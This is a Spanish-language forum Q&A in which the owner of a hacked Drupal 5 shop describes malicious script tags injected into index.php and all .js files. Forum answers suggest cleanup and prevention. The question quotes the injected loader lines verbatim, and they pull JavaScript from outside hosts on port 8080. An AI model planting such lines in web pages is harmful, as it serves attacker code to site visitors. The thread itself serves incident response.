Se trata de una tienda online basada en Drupal 5.
De repente ya no funcionó. Al acceder al sitio me apareció este error:
Error de análisis: error de sintaxis, '<' inesperado en /home/public_html/index.php en la línea 38
Tras una inspección más detallada, encontré las siguientes dos líneas al final de dicho index.php:
<script type="text/javascript" src="http://blog.nodisposable.com:8080/Hibernate.js"></script>
<!--7379ba6e55616ea66ac9d812fc0597ba-->
Después de eliminar manualmente esas 2 líneas, el sitio parece funcionar bien nuevamente.
Pero después de que se informaron más problemas (con la edición de páginas), descubrí que en realidad todos los archivos *.js están "infectados". Todos contienen una línea adicional al final:
document.write('<s'+'cript type="text/javascript" src="http://blog.nodisposable.com:8080/Hibernate.js"></scr'+'ipt>');
¿Este sitio ha sido pirateado? Al buscar en Google "blog.nodisposable.com", no aparece nada interesante. Ese sitio en sí parece legítimo. ¿Probablemente se haya pirateado?
¿Alguien puede explicar cómo pudo haber sucedido esto? ¿Qué puedo hacer para revertir esto? ¿Y qué puedo hacer para evitar esto en el futuro?
Actualizar
Después de restaurar una copia de seguridad del sitio web (no de la base de datos), volvió a suceder, pero ahora la etiqueta del script apuntaba a dolfy.sedonahyperbarics.com:8080/XHTML.js.
Aparentemente, también se crearon muchas cuentas de usuario aleatorias de Drupal. Entonces esto podría ser una señal de que en realidad se trataba de una vulnerabilidad de Drupal.
Los eliminamos y restringimos la creación de cuentas de usuario solo a administradores (debería haber sido así desde el principio, lo sé :-s). También cambiamos la contraseña del usuario administrador a algomás seguro.
Esperemos que no vuelva a ocurrir ahora.
Respuesta1
Si ha sido pirateado, no sabes si se ha instalado una puerta trasera.
Es posible que tengas que reinstalar desde una copia de seguridad en buen estado después de reformatearlo.
Nunca confíes en un sistema que ha tenido un intruso en el sistema.
Para evitarlo en el futuro, deberá mantenerse al día con las actualizaciones y suscribirse a listas que se mantengan actualizadas con las vulnerabilidades y las mejores prácticas para el software que está ejecutando (listas Drupal, listas de seguridad de su plataforma, etc.). , así como bloquear los servicios solo para los usuarios que sean necesarios para usar el sistema, usar contraseñas seguras, no hacer nada en texto sin cifrar y todo lo demás según las mejores prácticas de seguridad que se extienden mucho más allá del contexto de la respuesta aquí. Y mantenga buenas copias de seguridad e instale un sistema de detección de intrusiones (como un sistema similar a Tripwire) para comprobar si hay actividad de intrusos.
Respuesta2
Sí, me temo que estás infectado. Desafortunadamente, el "cómo" es imposible de decir sin MUCHA más inversión de tiempo y esfuerzo. Podría haber sido una vulnerabilidad en su instalación de Drupal (o uno de sus módulos), podría haber sido una vulnerabilidad en otra aplicación en el mismo servidor, podría haber sido una contraseña FTP débil (o robada), etc. de posibles puntos de entrada.
Respuesta3
He visto algo muy similar (casi idéntico) pero no relacionado con Drupal y definitivamente fue un truco.
Como dicen los demás, es difícil saberlo sin más información sobre su entorno. Una cosa rápida que puede hacer para impedir que se entregue es colocar una directiva en su archivo .htaccess que deniegue o redirija cualquier solicitud a ese archivo .js.
Respuesta4
Si bien se basó completamente solo en mi propia experiencia, cada pirateo como este, especialmente con reinfección, se debió a que alguien con acceso FTP al servidor infectó su máquina local y algo robó las credenciales; desea verificar los registros FTP y asegurarse. reconoces todas las direcciones IP y actualizaciones como válidas; si algo se vuelve a infectar, deberías verlo allí con bastante facilidad, si ese es el caso.